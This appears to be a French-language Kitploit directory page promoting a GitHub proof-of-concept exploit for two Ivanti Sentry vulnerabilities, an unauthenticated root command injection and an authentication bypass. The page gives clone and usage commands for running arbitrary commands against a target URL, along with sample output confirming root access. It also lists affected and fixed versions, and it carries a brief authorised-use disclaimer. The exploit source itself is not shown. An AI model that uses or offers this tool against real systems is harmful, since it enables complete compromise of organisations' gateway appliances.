Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-10520
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Voir le dépôt
450il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

Image ChatGPT du 11 juin 2026, 11:19:12

Ivanti Sentry Critical RCE

Exécution de code à distance sans authentification + Contournement de l'authentification

Auteur : Ashraf Zaryouh "0xBlackash"

GitHub


📌 Aperçu

Deux vulnérabilités critiques affectant Ivanti Sentry (anciennement MobileIron Sentry) :

  • CVE-2026-10520 → CVSS 10.0 - Injection de commandes OS sans authentification (RCE en tant que root)
  • CVE-2026-10523 → CVSS 9.9 - Contournement de l'authentification

Ces failles permettent à des attaquants non authentifiés de compromettre entièrement le système.


✨ Fonctionnalités

  • ✅ PoC propre et rapide
  • ✅ Sans authentification (aucun identifiant requis)
Télécharger l’outil
  • ✅ Exécution de commandes en tant que root
  • ✅ Formatage détaillé de la sortie
  • ✅ Support proxy
  • ✅ Mode verbeux
  • ✅ Belle interface terminal

  • 🚀 Utilisation

    root@kitploit:~
    python3 CVE-2026-10520.py --url <CIBLE> --cmd <COMMANDE>
    

    Exemples

    root@kitploit:~
    # Utilisation de base
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
    
    # Mode verbeux
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
    
    # Avec proxy
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
    
    # Vérifier le noyau
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
    

    📋 Options

    ArgumentDescriptionRequis
    --urlURL cible (ex. https://cible:8443)Oui
    --cmdCommande à exécuterOui
    -v, --verboseActiver le mode verbeuxNon
    --proxyProxy HTTP (hôte:port)Non

    🛠️ Installation

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-10520.git
    cd CVE-2026-10520
    chmod +x CVE-2026-10520.py
    

    📷 Exploitation réussie

    Lorsque la cible est vulnérable, vous verrez :

    root@kitploit:~
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      
              CVE-2026-10520 & CVE-2026-10523 PoC Exploit
              Ivanti Sentry Pre-Auth RCE + Auth Bypass
              
              Author: Ashraf Zaryouh "0xBlackash"
              GitHub: https://github.com/0xBlackash
    
    
    [+] Target is VULNERABLE!
    Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    

    ⚠️ Avertissement

    Cet outil est destiné uniquement à des tests de sécurité éducatifs et autorisés.
    L'utilisation non autorisée sur des systèmes dont vous n'êtes pas propriétaire est illégale.
    L'auteur n'assume aucune responsabilité en cas d'utilisation abusive.


    🔧 Versions affectées

    • Ivanti Sentry avant 10.5.2, 10.6.2, 10.7.1

    Corrigé dans : 10.5.2 / 10.6.2 / 10.7.1


    📜 Références

    • Avis officiel d'Ivanti
    • Recherche originale de watchTowr Labs
    • Entrées NVD : CVE-2026-10520, CVE-2026-10523

    Fait avec ❤️ par Ashraf Zaryouh "0xBlackash"

    Mettez une étoile au dépôt si vous l'avez trouvé utile ! ⭐